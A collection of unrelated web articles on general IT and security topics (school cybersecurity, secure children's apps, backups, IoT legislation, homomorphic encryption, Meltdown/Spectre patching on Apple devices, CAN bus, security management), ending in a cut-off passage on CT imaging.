The education sector has seen its fair share of cybersecurity attacks since the widespread shift to remote classrooms. According to Microsoft, the global education industry has the most malware attacks, even more than prominent industries such as business, finance, and healthcare. K-12 schools especially have experienced an uptick in ransomware and Distributed Denial of Service (DDoS). Many Canadian schools are experiencing cyber security incidents, damaging the integrity of their student data and privacy. With hackers consistently seeking to take advantage of the vulnerabilities in new technology, this prompts further discussion into why education is such a highly targeted industry.
The rapid shift to remote learning is an obvious culprit for the increasing threat level, but higher education institutions were already vulnerable before the pandemic. Many students simply lack the proper security awareness when using their online devices. In Morphisec’s CyberSecurity Threat Index, more than 30% of higher education breaches were caused by students falling victim to email scams, misusing social media, or other careless online activities. Budgetary constraints are also to blame for increasing online attacks, as many schools lack adequate funding to support a robust cybersecurity infrastructure. Cybercriminals recognize the vast amount of student data that schools have on record, and this incentivizes them further to infiltrate their systems.
Many of the new remote learning technologies introduced during the pandemic have exposed the risks associated with a lack of stringent security measures. For example, until recently, Agora’s video conferencing software exhibited a vulnerability that would have allowed hackers to spy on video and audio calls. With a growing number of students accessing remote learning technologies through their schools’ networks, it’s especially critical for schools to re-evaluate their security protocols to safeguard their students.
Safeguarding the Virtual Classroom
Schools at all levels need to proactively secure their digital technologies and safeguard their students’ data integrity. With the right approach, students and educators can mitigate the risks of cyber threats. Here are four critical cybersecurity steps that schools should take immediately:
1.Enforce User Awareness Training
It only takes one person to allow a hacker to infiltrate a school system. Digital security training is a must to ensure that students and faculty can recognize and take the appropriate action for suspicious activities like phishing emails. For example, a common cyber threat is when hackers pose as school officials asking for important information such as tax information or identification information.
Since many of the learning technologies on the market are new to students and staff, it’s especially critical to understand the implications of a security breach and the necessary steps to mitigate risks.
2.User Access Control
The principle of “least privilege” can also help avoid a cyber attack. This principle only allows users access to data and systems on a need-to-know basis and can mitigate data breaches that occur via unauthorized or unnecessary access. Hackers often try to infiltrate lower-level devices and accounts as a way to gain access to higher-value accounts and systems. Schools can take action by optimizing a list of what users have access to, which functions they have access to, and why. Ensuring that users have access to only what they need will limit attacks to smaller areas of the system and help protect the security ecosystem as a whole.
3.Update Security and Password Management Policies
An often overlooked but critical cybersecurity protocol is having a robust password management policy. These policies must also be in accordance with provincial and territorial legislation, which set guidelines and rules that govern how students and faculty use their devices and online learning technologies. Password management policies that encourage strong passwords and multi-factor authentication are essential to prevent password sharing and unrestricted access.
4.Third Party Vendor Management
Third-party technology vendors have become an integral component of distance learning, but they are also a vulnerability. Educational institutions need to ensure that they are properly managing their technology vendors so their students’ safety is prioritized above all else. Undergoing a thorough vetting process to evaluate third-party technology, as well as vendors’ terms and conditions, will help identify any security gaps that can create greater issues down the road.
Make Distance Learning Safe Learning
The ascendance of distance learning during the pandemic has given educators, students, and parents new insights into both the opportunities and challenges of not being in a physical classroom. One of the most critical is the importance of creating safe and secure virtual environments to ensure that students are safe. Despite the benefits that education technology provides, without proper training or technical safeguards in place, schools and students are left vulnerable to the dangers of external threats. By enhancing awareness of cyber threats and implementing a strong security strategy, educators and parents can start creating safer learning environments for students to thrive.
To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, subscribe to our email, listen to our podcast Hackable?, and ‘Like’ us on Facebook.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:ac828194-695f-4801-b13d-5b5a39124f5a> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/family-safety/prioritizing-security-in-a-remote-learning-environment/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00688.warc.gz | en | 0.946844 | 1,227 | 2.640625 | 3 |
Designing an award-winning applications for children doesn’t just mean engaging graphics and interactive audiovisuals; in-built cyber security controls, and data protection is critical.
When the COVID-19 global pandemic broke out, the whole world had to turn to digital modes to continue working, networking and socializing, especially when the lockdowns were imposed. Schools also began conducting online classes, and children’s screen time witnessed a dramatic increase. This was over and above the time that children already spend online on various platforms and websites for gaming, entertainment and social media.
It has been estimated that children aged between 8 years and 18 years spend upwards of seven hours online. This makes them prone to cyberbullying and they can also become easy targets to cyber predators. They are also unaware of phishing and cyber security best practices, so they are susceptible to sharing private information that could fall into the hands of nefarious actors.
Given the risks involved, there are several inherent challenges in designing apps for children that app developers must overcome to ensure that the data is secure and private, without compromising on the user experience.
Challenges in creating secure applications for children
Organizations and app development teams must understand the various risks involved before releasing any public-facing app for children. Designing an award-winning app for children does not only mean using engaging and interactive audio and visuals, but the protection of all data related to its users is also vital. Some of the challenges of creating secure apps, especially for children, are:
· Secure and intuitive user interface and experience
The process of developing apps is usually complex; it gets more complicated when the target market is children below the age of 16 years. From the application standpoint, ensuring the user interface and user experience are simple, secure and intuitive is the predominant challenge. The app development team and the organization have to recognize children as spontaneous and intelligent, with an exceptional ability to learn new things.
· Uncompromising adherence to compliances
The other major challenge is adhering to the necessary compliances and policies with regard to children’s data. Though there seem to be no specific guidelines pertaining to the protection of children’s data in India, many app developers and organizations fall back on the European Union’s General Data Protection Regulation (GDPR).
The EU’s GDPR clearly states that organizations and app developers have to obtain the consent of parents or guardians mandatorily before processing children’s data. This is to ensure that no one can manipulate the data or no one with malicious intent can access the sensitive data.
Best practices for app developers when creating applications for children:
· Plan for cybersecurity right from the start
Most app developers and organizations rush to release the app and as a result, focus on creating the best user experience and functionality. Little thought is given to data privacy and security aspects – currently, with no laws in place, corrective action is thought of and taken only post-exploitation of data. This is mainly due to the lack of mandatory regulations and laws in place, like the EU’s GDPR.
Once stringent laws and regulations are in place, data privacy and security will become mandatory. Organizations and app developers will have to take into account data privacy and security from the beginning. It is best if this is part of the planning for development, and included in the product roadmap and budget. It is also important to ensure an audit or review by a third party.
· In-built security controls
Unless there is a paid subscription, a majority of the gaming and entertainment applications include in-app purchases or payment transactions. However, there is very little monitoring on who is performing these transactions, whether the purchaser is actually a child or an adult. Such situations could pose serious cyber security threats, especially in the case of public-facing children’s applications.
To overcome such risky situations, security controls can be built-in by app developers, such as multi-factor authentication, mandatory manual intervention before each transaction, and filtering mechanisms based on the age of the user.
· Using AI, ML, and NLP effectively
Given the potential cyber security threats and risks, app developers and organizations must go beyond the current practices and exploit Artificial Intelligence and Machine Learning, use Natural Language Processing (NLP) for word predictions, develop algorithms for pattern detection and alert the guardians or parents in case of any deviation. For organizations and app developers, AI and ML can be used to detect anomalies, provide insights, give feedback to the backend teams and report the incidents to law enforcement, if required. If these security controls are in-built, organizations and app developers can build far safer apps for children.
· Use compliances to stay on the safe side
Given that data protection laws in India are yet to be enforced, organizations could well model their protections on the industry standards used in other countries. In the absence of laws and guidelines, organizations could follow those enshrined under the EU’s GDPR, Data Protection Act, etc. to either have in-built security controls or define their own best practices.
· Refer to OWASP Top 10
Some security best practices are coming from different standards like the Open Web Application Security Project (OWASP Top 10), and National Institute Standards and Technology. Some changes were made to OWASP Top 10 in 2021 and design-level security best practices have now been defined. If the security controls specified under these guidelines and standards are put in place, the public-facing app will be truly secure, irrespective of its target audience.
· Create awareness among parents and guardians
It’s recommended that parents and guardians actively inform and educate themselves on the online habits and explorations of their children. Caregivers also have the responsibility of raising awareness among children about the risks involved in sharing sensitive data along with how best to protect themselves when using public-facing apps.
Rely on an expert like Entersoft
Entersoft, a leading application security provider, is helping businesses across the fintech and blockchain technology sectors secure their apps through future-ready solutions. Entersoft can help app developers and organizations better understand their risks and threat factors while defining means of safeguarding their applications.
The best way to build secure apps is to start from the design stage itself, as a simple penetration test on an app is not enough to understand all inherent risks. This is where Entersoft’s services come into play.
The first step is to understand the business purpose, usage of the app, why the specific age group is being on-boarded, and the region-specific laws and compliances that need to be adhered to. | <urn:uuid:e0157c99-c0a7-484b-8e34-18864697ce80> | CC-MAIN-2022-40 | https://blog.entersoftsecurity.com/applications-for-children/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00088.warc.gz | en | 0.938253 | 1,533 | 2.875 | 3 |
The Oxford English Dictionary defines backup as “The procedure for making extra copies of data in case the original is lost or damaged” and “An extra copy of data from a computer”. The word backup in this meaning was first used in 1951, when the first computer was built. This computer, called the UNIVAC (Universal Automatic Computer), had its own internal storage, but required data and programs to be loaded into it via punch cards. These punch cards can be considered the first data storage devices for backups. Anytime a program or dataset needed to be loaded, it would be read from the punch cards, similar to how a restore functions.
Over time, as computer storage devices have changed, so too have the backup devices. After these first punch cards came magnetic tapes, then hard drives, floppy disks, optical disks, and flash drives. With the advent of local area networks in the late 1970s, backups were no longer performed to a storage target directly connected to the computer. Backups were able to write over networks to the backup medium somewhere else. With the emergence of the Internet in 1990, online backup services grew and grew. Today, The Cloud is a popular backup target.
Shortly after computers were invented, someone decided that they needed to be backed up. Traditionally, this involved an agent installed on the client. That agent then used the systems resources to look at all the files on the system and then move the files to the backup environment. This could consume a lot of resources. Backups needed to be performed at night, when the systems were idle, to prevent production outages. The backup data would travel over the network, and large systems would take hours (or days) to finish a single backup. How many Backup Administrators have fielded a call from their Network Administrators demanding that backups be stopped to allow network bandwidth for other tasks?
For the most part, backups have gone relatively unchanged for 60+ years. A computer system uses an agent to copy files from its primary storage location to a backup storage location. Be it punch cards or magnetic tape, flash drives or over the network, an agent was used to copy that data, using the resources of the host system.
How Virtualization Changes Backups
A virtual machine looks and acts very much like a regular, physical computer systems. Many times, users will never know that the system they are using is a virtual machine. And this holds true for the applications. A virtual machine can still be backed up using the traditional backup agent. There are a few drawbacks to this method, though. First off, if there are multiple agent backups running at the same time, one the physical host, each virtual machine backup will be rate limited by the bandwidth of the host. This is where some of the underlying technology of virtual machines benefits modern backup procedures.
Each virtual machine is made up of one of more virtual machine disk files. These disk files reside on some kind of storage – either SAN-attached, Network attached NAS, or locally attached disk (DAS). When using SAN attached storage, the same storage can be presented to the backup host. In these cases, the backups can be made to run off the SAN, eliminating performance issues and resource bottlenecks on the virtual machines and their hosts. This results in true off-host backups with a boost to the speed of each backup.
Another benefit that virtualization brings is change block tracking. This allows the physical host to monitor and record blocks that change within each virtual machine. Rather than looking through an entire directory tree to find files that have changed, the changed blocks are known, and those are the only ones that need to be backed up. By backing up only these changed blocks, the time a backup takes to run is dramatically reduced.
With the proper backup software, the right hardware configuration, and up to date virtualization platforms, backups of hundreds of virtual machines can be accomplished in a matter of minutes. What used to take hours during the night, can now be accomplished in minutes, anytime during the day. Can you say your virtual machines are protected like that? | <urn:uuid:d35b8353-c940-44c7-a1d8-226cd6052f29> | CC-MAIN-2022-40 | https://www.ensono.com/resources/blog/what-backup/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00088.warc.gz | en | 0.951396 | 838 | 3.984375 | 4 |
“Sometimes the wheel turns slowly, but it turns.”
That quote, made famous by Lorne Michaels, certainly applies in the case of the government’s involvement in securing internet-connected devices.
By now, almost everyone has at least one “smart” device in their home or driveway. Projections are that there will be more internet-connected devices than computers and mobile phones by the year 2020, and the rate of growth is still increasing.
As exciting as that sounds, there’s a dark side to those statistics. Most manufacturers are notoriously bad when it comes to securing them. In fact, most internet-connected devices don’t have even basic security protections in place, which has led to hackers creating vast armies of enslaved devices to serve in their bot nets, which they use to conduct denial of service attacks.
In recent months, we’ve seen hackers take control of everything from smart guns to smart cars and even internet-connected medical devices.The key difference here is that while hacking your PC might cost you money, the examples above put human lives in danger, and finally, the government is getting involved.
There’s a new bill making its way through the halls of Congress called The Internet of Things Cybersecurity Improvement Act of 2017. While the name is a bit of a mouthful, its purpose is strikingly simple and clear. The bill proposes a minimum set of security standards that must be in place in order for the government to purchase smart devices.
Given the sheer amount of product the government purchases each year, for the first time, manufacturers have a clear and compelling reason to begin implementing device security, which they have been steadfastly ignoring to this point.
Currently, the fate of the bill is unknown, but it certainly seems like something that both major political parties can get behind. If it passes, it will be good news indeed for everyone who owns a smart device, which again, at this point, is almost everyone. Progress may have been slow in this case, and long overdue, but at last, the wheel is turning. | <urn:uuid:b05ae41a-dc0b-4f8b-a1b4-a20dcc15e053> | CC-MAIN-2022-40 | https://dartmsp.com/new-bill-may-help-secure-internet-connected-devices/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00088.warc.gz | en | 0.967477 | 427 | 2.6875 | 3 |
2021-01-19[:en]IBM recently announced big developments in homomorphic encryption. This could bring trustworthy confidential computing into the mainstream.
What is Confidential Computing?
Many organizations say that they can't use the cloud. They can't put their data in someone else's data center.
Now, if you only use cloud storage, then all is fine. Encrypt the data on premises. Store nothing but ciphertext in the cloud.
But what if you want to process your data? That is, literally do cloud computing? It seems that you need to decrypt your data in the cloud. Next, do the calculations. Finally, encrypt the result.
Or at least that is the traditional way.
Confidential computing means doing calculations while maintaining the data's confidentiality. New CPU architectures have provided some methods. However...
Hardware Solutions Have Had Problems
The past few years brought many unpleasant surprises about hardware security problems. A big one is related to Intel's Software Guard Extensions or SGX.
Intel built some security-related machine instructions into some recent CPUs. Both user programs and the OS kernel can use them to define enclaves, private regions of memory. Even the OS kernel can not read or write a user-defined enclave.
The plan would be to read encrypted data from the disk, storing it in the enclave. Then, decrypt it within the protected enclave. Next, do the calculations on the sensitive data. Finally, re-encrypt it and transfer it back to the disk.
At least that was the plan. Researchers have found several ways to expose enclave data. Many are variations on speculative execution attacks. Others are side-channel attacks.
Another possible hardware solution is AMD's EPYC Secure Encryption Virtualization, or SEV. This supports Google's Confidential VMs, virtual machines doing confidential computing in the Google Cloud.
I have created a list of hardware vulnerabilities. It's my attempt to keep track of developments. It's hard to keep up!
Hardware solutions for confidential computing have a poor track record. Pure cryptography seems more promising.
How Fast is Cryptography Developing at the Moment?
In October 2019, a team led by Google announced a major step forward in quantum computing. The team's quantum processor finished a task in 200 seconds. They estimated that the DOE's state-of-the-art supercomputer would take 10,000 years to finish the same task.
Meanwhile, NIST has a Post-Quantum Cryptography program well underway. In July 2020, they announced the Round 3 candidates for the coming standard.
Around that time, IBM announced practical tests of fully homomorphic encryption on MacOS and iOS and then on Linux.
This may be like the late 1970s. Public-key cryptography, Diffie-Hellman key agreement, RSA encryption, and DES all appeared during the period 1975-1977. That was before my time, but it's a famous three years.
How to Implement a Homomorphic Encryption Scheme?
Early work on fully homomorphic encryption placed extreme limits on the computation. You could calculate on ciphertext input, as long as your problem was limited to addition. Or a modulo operation. Or an Exclusive-OR operation. It was possible, but not useful.
Open source homomorphic encryption is now practical in the real world. See the above links to IBM's announcements for toolkits on Linux, MacOS, and iOS.
How Difficult is Homomorphic Encryption?
The software is available to be downloaded and used. It's easy for developers.
However, its computational complexity remains an issue. It's hard for computers. It's not as terribly slow as initial solutions were. But homomorphic encryption still makes even simple calculations significantly slower.
The good news is that its performance is acceptable for some popular uses.
For example, machine learning on big data sets containing sensitive information. That problem tolerates approximate answers, meaning that a speed/accuracy trade-off makes the technology practical.
There's still a long way to go in the way of performance for many compute jobs, but the recent developments are a large advance.
What to Know, and Where to go Next?
The CISSP and CCSP exams now include questions about homomorphic encryption. However, it's just "big picture" recognition of the topic. If you know "Homomorphic encryption means calculations on encrypted input yielding encrypted output", that should be plenty. Learning Tree's courses for CISSP test-prep and CCSP test-prep cover all you need to know for those exams.
To check recent developments, and see who is doing what, see the HomomorphicEncryption.org web site. It's run by an open consortium of industry, academia, and government.
If you want to go further, there's a nice survey paper covering the topic, explaining the terminology and concepts.[:] | <urn:uuid:24bb8683-3cef-46be-ba47-35ce8a8f5ac8> | CC-MAIN-2022-40 | https://www.learningtree.ca/blog/protect-cloud-secrets-with-homomorphic-encryption/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00088.warc.gz | en | 0.9434 | 1,004 | 2.78125 | 3 |
You've probably heard something about "Meltdown" and "Spectre," perhaps even in the mainstream media, and you likely heard that it has something to do with an Intel security flaw.
But do you know how it affects your Apple devices—your Mac, iPhone, iPad, iPod touch, Apple Watch, or Apple TV—and what actions you may need to take to stay safe?
Never fear, that's why we're here! It's a complex problem, but we'll break it down and share the main tidbits about these vulnerabilities you need to know as a user of Apple products.
What are Meltdown and Spectre?
On Monday, January 1, 2018, a developer blog, called "python sweetness," brought to light an issue in which "there is presently an embargoed security bug impacting apparently all contemporary CPU [central processing unit] architectures that implement virtual memory, requiring hardware changes to fully resolve."
The Register published an article the following day that emphasized the design flaw with regard to Intel processors, and from there snowballed into a worldwide discussion about a serious flaw in Intel CPUs that had major security implications.
Macs, along with the vast majority of the world's Windows and Linux PCs, use Intel processors.
As more information came to light in the subsequent days, it became clear that more than just Intel CPUs are affected; there are also implications for other processor architectures, including AMD processors as well as ARM-based processors like those found in Apple's iPhones and iPads.
It turns out that Intel and a handful of software development giants, among them Apple, Microsoft, and the Linux kernel developers, have known about the design flaw since at least November 2017 and have been working behind the scenes to prepare for a coordinated public disclosure and remediation of the issue. (At least, that was the plan until "python sweetness" and The Register brought the issue out of obscurity and into the public spotlight.)
"Meltdown" and "Spectre" are nicknames for techniques that can enable an attacker to access computer memory that shouldn't be accessible; this is accomplished by abusing a technology called "speculative execution."
Speculative execution is a processing feature that enables computing devices to run faster by predicting what will happen next in an app, and preemptively working toward multiple possible outcomes all at once.
The end result of leveraging Meltdown and Spectre could include leaks of sensitive data such as passwords and credit card information, among other things.
What do all these names mean?
A vulnerability may be known by many names.
Perhaps the broadest term for the vulnerabilities in question would be "speculative execution vulnerabilities."
"Meltdown" and "Spectre" are the main names that have caught on in association with this bug; each of these are unique and will be described further in their own sections below.
When the story broke, it was at first being discussed online under the name KPTI in reference to Kernel Page-table Isolation (formerly called KAISER), a feature of the Linux kernel that mitigates the Meltdown vulnerability.
There's also a not-safe-for-work nickname that was reportedly conceived by the Linux kernel team: F***WIT (which stands for "Forcefully Unmap Complete Kernel With Interrupt Trampolines").
You may also see references to "CVE" numbers associated with these bugs. CVE stands for Common Vulnerabilities and Exposures, and CVE numbers are used for the purpose of tracking the same bug across multiple vendors and media outlets, as bugs tend to be described in many different ways and may have various nicknames.
What is Meltdown?
Meltdown is the nickname for one of two major categories of exploits at this time. It may also be referred to as the "rogue data cache load" technique, or CVE-2017-5754.
Successful exploitation could allow an attacker's code running in a user-privileged app to read kernel (superuser-privileged) memory.
Apple said that its own analysis suggested that the Meltdown exploitation technique "has the most potential to be exploited" as compared with the Spectre exploitation techniques.
What is Spectre?
The other exploitation techniques are known collectively as Spectre (sometimes spelled Specter). The two techniques may be referred to as "bounds check bypass" or CVE-2017-5753, and "branch target injection" or CVE-2017-5715.
From Apple's public statement:
In other words, Web pages in an unpatched browser can potentially exploit Spectre.
Is my Apple device safe from Meltdown?
If your Apple device is running one of the following operating systems, you're already (at least partially) protected against Meltdown attacks:
- macOS 10.13.2 or later
- iOS 11.2 or later
- tvOS 11.2 or later
It's important to note that Apple often releases security-only updates for the two previous versions of macOS, in this case Sierra and El Capitan. However, Apple has not given any indication that updates for Sierra or El Capitan are forthcoming.
Thus, if you have an older version of macOS (or OS X), you'll need to upgrade to macOS High Sierra version 10.13.2 or later to protect against Meltdown attacks. (You may need to first find out whether your Mac can be upgraded.)
Apple has indicated that macOS High Sierra version 10.13.3 is in the works and will include further protections against Meltdown attacks, so be sure to install it when it becomes available.
According to Apple, "Apple Watch is not affected by either Meltdown or Spectre."
Apple specifically claims "watchOS did not require mitigation" for Meltdown, while "watchOS is unaffected by Spectre."
The company has not offered further explanation as to why watchOS, which shares much of its codebase with iOS, allegedly does not require mitigations.
Is my Apple device safe from Spectre?
In short: no, not yet (except for Apple Watch, which Apple says is unaffected).
Apple is planning to release a Safari update for both macOS and iOS "in the coming days," so stay tuned for that. Once the updates are available, you'll find the Mac update in the Mac App Store app under Updates, and you'll find the iOS update in the Settings app under General > Software Update.
If you use a third-party browser such as Firefox or Chrome, you'll want to install any new updates that get released this month.
Firefox 47.0.4 is already out and includes mitigations for Spectre. You can check for updates by going to the Firefox menu and selecting About Firefox, or you can download a fresh copy of the app.
Meanwhile, Google isn't planning to update Chrome until around January 23, according to Fortune. However, Chrome users who wish to be protected can follow a manual process to enable a Spectre mitigation (note, however, that doing so will increase Chrome's memory consumption by about 10–20%).
Until Apple and Google release patches, it's probably safest to use Firefox 47.0.4 or lateron your Mac, and avoid using Safari or Chrome for now.
As for iOS devices (iPhone, iPad, and iPod touch), there doesn't seem to be a safe alternative browser, so you'll just have to wait patiently for Apple's forthcoming update. If you're concerned, you may wish to avoid logging into sites or entering any passwords or sensitive information in Safari or other mobile browsers for iOS, and instead opt to use your Mac for Web browsing until Apple updates iOS.
Will Apple update Macs' EFI firmware?
It remains to be seen whether Apple will release EFI firmware updates for Macs to more fully address the issue closer to the hardware level.
Noting that Apple did not say anything about EFI in its public statement, we reached out to Apple to inquire about whether EFI updates are forthcoming. Apple's Todd Wilder responded with the following statement:
"We no longer distinguish between EFI updates and OS updates for the Mac. We will be applying mitigations wherever in the stack it is necessary, and customers will receive those updates in the form of macOS updates."
In other words, if Apple does decide that it's necessary to release EFI firmware updates for any Macs, those updates would be bundled with a future version of macOS High Sierra or later, rather than published as a distinct and separate update.
Will my device be slower after I update?
Early reports suggested that by disabling speculative execution functionality, certain system functions may be anywhere from 5 to 30 percent slower.
Apple claims that its Meltdown and Spectre mitigations do not cause such serious performance degradation.
According to Apple, the Meltdown mitigations already in place in macOS 10.13.2, iOS 11.2, and tvOS 11.2 "resulted in no measurable reduction in … performance."
However, Apple indicates that its upcoming mitigations for Spectre in Safari may have a performance impact of less than 2.5% in one particular benchmark, while other benchmarks see no measurable reduction in performance.
In short, your Apple device probably won't feel slower as a result of Apple's Meltdown and Spectre mitigations. (Your iOS device might, however, feel slower for other reasons.)
Is there anything else I should know?
Absolutely. First of all, this is a developing story, so expect further plot twists. It's very likely that we still don't know all of the ramifications of the flaws in speculative execution processor technology.
There's a special episode of the Intego Mac Podcast coming next Wednesday, January 10, in which Kirk McElhearn and I further discuss the topic and explain what speculative execution means. Be sure to subscribe now in iTunes/Podcasts or in your favorite podcatcher to make sure you get the Meltdown/Spectre episode when it becomes available.
If you own or support any Windows systems (including if you run Windows on your Mac, either via Boot Camp or via virtual machine software such as VMware Fusion, Parallels Desktop, or Oracle VirtualBox), be sure to install the latest Windows updates from Microsoft.
Note that systems running Windows 7 (or Server 2008 R2) or Windows 8.1 (or Server 2012 R2) may need to manually download and apply the patch, since it may not appear in Windows Update; meanwhile, Windows 10 (and Server 2016) users should get the update as part of the usual patch cycle. Make sure your Windows anti-virus is fully up to date before you install the Windows patches.
Windows PCs may also need BIOS/UEFI firmware updates in order to be better protected. Not all PC manufacturers have given information about which PC models will be receiving updates, and some older PCs simply won't be getting BIOS updates. If you're running Windows via a virtual machine on your Mac, check with your VM vendor to see whether a new version may be needed (VMware has released a public statement, but Parallels and Oracle have not yet).
If you'd like to learn more about the speculative execution vulnerabilities, the following resources may be useful:
- Apple has issued a statement titled "About speculative execution vulnerabilities in ARM-based and Intel CPUs"
- https://meltdownattack.com is the "official" Meltdown and Spectre information site
- Bleeping Computer and Forbes have both attempted comprehensive lists of vendor updates, although neither list is complete (neither links to BIOS updates, for example)
Image credit: xkcd #1938 by Randall Munroe
The world's public knowledge about speculative execution vulnerabilities is only just beginning to blossom. As more brilliant minds begin exploring potential avenues for exploitation, it's likely that more patches will be needed, so subscribe to The Mac Security Blog, the Intego Mac Podcast, and Intego's YouTube channel to make sure you don't miss any important news! | <urn:uuid:93f42196-03af-4c1d-a1bb-9dfe8733663a> | CC-MAIN-2022-40 | https://support.intego.com/hc/es/articles/115003855272-Meltdown-y-Spectre-lo-que-los-usuarios-de-Apple-necesitan-saber | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00088.warc.gz | en | 0.9422 | 2,534 | 2.6875 | 3 |
What is CAN bus?
Controller Area Network (CAN) bus is a standard in the automotive industry that was designed to make communication between microcontrollers possible, and serves as a control system for modern vehicles and industrial automation. This also allows for monitoring a range of on-board diagnostics (via the OBD-II port) including reporting on events such as engine failure or airbag deployment.
The CAN bus protocol was developed by Robert Bosch in 1983, and officially released by the Society of Automotive Engineers (SAE) in 1986, with the first CAN controller chips produced by Intel in 1987.
There are several versions of the CAN specification with the most recent being CAN 2.0, which has two parts. Part A is the standard format with an 11-bit identifier (CAN 2.0A), and part B has a 29-bit identifier (CAN 2.0B). The CAN standard ISO 11898 was reorganised in 1993 into ISO 11898-1 (covering the data link layer) and ISO 11898-2 which deals with the CAN physical layer for high-speed CAN.
Low-speed CAN (fault-tolerant) is covered by ISO 11898-3.
The CAN standards continue to be developed with CAN FD 1.0 (CAN with Flexible Data-Rate) released in 2012. The different CAN frame format allows for different data length code and switching to a faster bit rate (often measured in mbit or kbit) after the arbitration is decided.
The CAN bus system is used in on-board diagnostics (OBD) for sending CAN data to an external system such as a telematics solution.
Modern vehicles can have around 70 Electronic Control Units (ECUs) to control different functionality within the car or truck, using the CAN bus network for data transmission and coordinating different systems. ECUs, also known as CAN nodes, can communicate externally with the use of ethernet or USB connectors.
All ECU modules (or CAN nodes) are connected via a twisted pair two-wire bus (120 ohms resistor) and communicate in logic bits. This is either a dominant (higher priority) bit or recessive (lower priority).
All CAN nodes are regulated by arbitration that ensures all are synchronised to sample the same bit at the same time.
The maximum speed (or bandwidth) of the CAN bus, according to the international standard, is 1MB/s (or 1000 bytes of data per second). This bitrate (or variable R) is the number of bits that are conveyed or processed per unit of time, and decrease as the network distance increases.
The CAN bus standard provides an effective, universal standard for complex automotive control systems and industrial automation, as well as a reliable method for vehicles that use CAN bus to transmit data to external systems, improving the monitoring, management and maintenance of these assets. | <urn:uuid:0fa628ef-6a63-4b96-9f6c-ab8ad4d794eb> | CC-MAIN-2022-40 | https://inseego.com/resources/fleet-glossary/what-is-can-bus/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00088.warc.gz | en | 0.937261 | 588 | 3.765625 | 4 |
What are the key technologies that can protect your business from cyber-attacks?
Most businesses would look for technologies such as threat detection, anti-malware, firewalls, and antivirus software. The choice comes down to how often your systems are patched, or what policies and procedures are in place.
However, the biggest threat to a business is likely to be something that they are not aware of. Remember the famous quote from US Secretary of Defence Donald Rumsfeld about the known unknowns and the unknown unknowns? He was talking about intelligence information, but his comment applies to any situation where the risks are unknown.
In the cyber security field, those with malicious intent are constantly dreaming up new ways to attack your business. They seek out vulnerabilities, so the threat landscape is constantly shifting. The only way to address this is to continually evaluate the risks to your business so that you can put appropriate mitigation and controls in place.
This is where the Information Security Manager comes in. They help businesses evaluate the threats they face. They can explain the company’s vulnerability to each type of risk and – perhaps their biggest challenge – what the potential impact is. While most people find it straightforward to grasp the impact of the office burning down, it can be much more difficult to grasp the full implications of a cyber-attack.
The shipping firm, Maersk, is a classic example. Infected by the NotPetya malware, its operations ground to a halt. While data was backed up, applications were not only infected but also destroyed so the data could not be restored. This led to fixed phone lines becoming inoperable, and contacts being wiped from mobiles because they had been synchronised with Outlook.
To minimise the risk of cyber-attacks, the Information Security Manager will present the risk framework to Senior Management, who can then make an informed decision about their company’s Risk Appetite i.e., the extent to which they wish to protect themselves against each risk, considering the company’s ethical stance, the legal frameworks it operates in and its security requirements. For example, the security requirements for a bank will be different from those for a construction firm.
The Information Security Manager then works across the business ensuring appropriate policies and controls are in place, educating people about security and then monitoring and ‘marking their homework’ to ensure that they comply. They would be responsible for explaining the risks and their implications and convincing members of staff of the importance of complying with security policies. They also need to be confident in what they know and be able to explain clearly why they are recommending a particular course of action.
Smaller organisations may choose to outsource the Information Security Manager role due to a skills gap. This has the advantage of bringing in an impartial third party, who may be better equipped to communicate the issues, and to ‘speak truth to power’ i.e., provide Senior Management with what may be unpalatable information about potential risks and the need to address them. But whether handled in-house or externally, the information manager is vital to effective cyber security. | <urn:uuid:7923d548-663e-4e11-903e-f8607c2ae4f4> | CC-MAIN-2022-40 | https://www.fordway.com/tackling-the-unknown-unknowns-of-cyber-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00088.warc.gz | en | 0.963046 | 639 | 2.609375 | 3 |
Phishing over the web can be typified with that of trying to get personal information for mischievous use. Receiving unsolicited emails coming from unknown origins which would make you believe that you have won something in a lottery or a sweepstakes contest are the common forms of phishing.
The people who send you these emails are merely after your personal information. They would get information such as credit card numbers, bank accounts, and other useful information to which they can use over the web, an open space of being able to transact with a lot of security breaches that most people know today.
Some would even provide links to certain pages which are professionally done, all the more deceiving a person that the offer is for real. But the next time you get such e-mails from an unknown source, all you have to do is just think about it for a second. How can you get such mails from someone or something that you don’t even remember joining? The rest is history. | <urn:uuid:cc2ed718-65fe-4a58-915d-5f0f47e0af1f> | CC-MAIN-2022-40 | https://www.it-security-blog.com/tag/e-mails/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00088.warc.gz | en | 0.976578 | 202 | 2.578125 | 3 |
Computed tomography (CT) is a widely-used process in medicine and industry. Many X-ray images taken around a common axis of rotation are combined to create a three-dimensional view of an object, including the interior.
In medicine, this technique is commonly used for non-invasive diagnostic applications such as searching for cancerous masses. Industrial applications include examining metal components for stress fractures and comparing produced materials to the original computer-aided design (CAD) specifications. While this process provides invaluable insight, it also presents an analytical challenge.
